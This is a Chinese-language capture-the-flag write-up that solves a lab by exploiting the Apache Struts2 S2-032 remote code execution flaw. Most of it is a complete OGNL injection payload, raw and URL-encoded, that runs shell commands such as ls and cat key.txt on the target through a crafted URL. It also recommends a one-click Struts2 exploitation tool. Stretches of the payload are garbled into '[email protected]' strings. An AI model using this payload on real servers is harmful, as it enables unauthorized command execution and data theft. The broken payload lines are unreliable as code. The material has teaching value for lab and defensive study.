本題的解題方向是struts2的S2-032漏洞,啓用動態方法調用時,可以通過方法:前綴執行遠程代碼執行。
method: < name > Action 前綴去調用聲明爲 public 的函數,但是在低版本 的Strtus2中並不會對 name 方法值做 OGNL 計算,反而在高版本中會進行計算。
其中需要利用exp進行實現:
首先構造poc
編碼前:由編碼後解析成的代碼
?method:#[email protected]@DEFAULT_MEMBER_ACCESS,#[email protected]@getResponse(),#res.setCharacterEncoding(#parameters.encoding[0]),#w=#res.getWriter(),#s=new+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()).useDelimiter(#parameters.pp[0]),#str=#s.hasNext()?#s.next():#parameters.ppp[0],#w.print(#str),#w.close(),1?#xx:#request.toString&pp=\A&ppp= &encoding=UTF-8&cmd=ls
ls可更換成其他命令
編碼後:
?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=ls
在瀏覽器地址欄輸入http://靶場ip/上面編碼後的exp
查看key.txt的值
編碼前:由編碼後解析成的代碼
?method:#[email protected]@DEFAULT_MEMBER_ACCESS,#[email protected]@getResponse(),#res.setCharacterEncoding(#parameters.encoding[0]),#w=#res.getWriter(),#s=new+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()).useDelimiter(#parameters.pp[0]),#str=#s.hasNext()?#s.next():#parameters.ppp[0],#w.print(#str),#w.close(),1?#xx:#request.toString&pp=\A&ppp= &encoding=UTF-8&cmd=cat key.txt
編碼後:
?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat key.txt
在瀏覽器地址欄輸入http://靶場ip/上面編碼後的exp
得到key值!
如果不知道exp怎麼辦,沒關係,還有另一種辦法,我們可以利用struts2的漏洞利用檢查工具來進行一鍵式操作
提交方式修改成get方式,然後點擊驗證漏洞
得知有漏洞後,我們可以開始命令執行,在漏洞編號處選擇剛纔掃描出來的漏洞編號。輸入ls命令,可以看到所有的文件。其中看到了key.txt文件。於是我們再輸入cat key.txt命令查看該文件內容,得到了本題的key